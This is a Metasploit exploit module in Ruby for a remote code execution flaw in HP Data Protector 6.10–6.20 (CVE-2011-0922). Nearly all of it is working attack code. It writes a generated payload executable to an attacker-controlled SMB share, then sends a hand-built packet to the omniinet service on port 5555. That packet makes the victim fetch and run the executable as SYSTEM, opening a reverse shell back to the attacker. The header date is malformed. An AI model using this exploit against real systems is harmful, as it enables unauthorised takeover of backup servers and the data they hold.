##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-13-07
# Exploit Author: Ben Turner, Doug McLeod
# Vendor Homepage: www.hp.com
# Version: 6.10 & 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB
include Msf::Exploit::EXE
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::Client
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize
super(
'Name' => 'HP Data Protector CMD Install Service Vulnerability',
'Description' => %Q{
This module exploits HP Data Protector omniinet process on Windows only. This invokes the install service function that allows for a reverse tcp payload to your host. To ensure this works, the SMB server must have a share called Omniback which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
},
'Author' => [ 'Ben Turner', 'Doug McLeod' ],
'License' => BSD_LICENSE,
'References' =>
[
],
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'process'
},
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Platform' => ['win'],
'Targets' =>
[
[ 'HP Data Protector 6.10/6.11/6.20 on Windows', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'July 29 2013'
)
register_options([
OptString.new('SMBServer', [true, 'The IP address of the SMB server which hosts your share.', 'IPAddress']),
Opt::RPORT(5555),
], self.class)
end
def exploit
lhost = "#{datastore['SMBServer']}"
lhostfull = ""
lhost.each_char do |character|
lhostfull = lhostfull << "\x00" << character
end
shellcode = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
shellcode << lhostfull
shellcode << "\x00\x00\x00\x20\x00\x30\x00"
shellcode << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
shellcode << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
shellcode << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
shellcode << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
shellcode << "\x5c"
shellcode << lhostfull
shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
shellcode << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
shellcode << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
shellcode << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
shellcode << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
shellcode << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
shellcode << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
shellcode << lhostfull
shellcode << "\x5c\x00\x5c\x00\x4f\x00"
shellcode << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
shellcode << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
shellcode << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
shellcode << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
shellcode << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
shellcode << "\x5c\x00\x5c"
shellcode << lhostfull
shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
shellcode << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
shellcode << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
shellcode << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
shellcode << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
shellcode << lhostfull
shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
shellcode << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
def filedrop()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\Omniback\\i386\\installservice.exe'...")
self.simple.connect("\\\\#{datastore['SMBServer']}\\Omniback")
exe = generate_payload_exe
fd = smb_open("\\i386\\installservice.exe", 'rwct')
fd << exe
fd.close
self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost
rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
abort()
end
end
def filetest()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Checking the remote share for: \\\\#{datastore['SMBServer']}\\Omniback\\i386\\installservice.exe'...\n")
self.simple.connect("\\\\#{datastore['SMBServer']}\\Omniback")
file = "\\i386\\installservice.exe"
filetest = smb_file_exist?(file)
if filetest
print_good(" Found, upload was succesful! \\\\#{datastore['SMBServer']}\\Omniback\\#{file}")
else
print_error("\\\\#{datastore['SMBServer']}\\Omniback\\#{file} - The file does not exist, try again!")
end
self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost
rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
abort()
end
end
begin
filedrop()
filetest()
connect()
sock.put(shellcode)
print_status("Waiting ...")
print_good("Sent :) Good Luck")
rescue ::Exception => e
print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
abort()
end
handler
#disconnect
end
end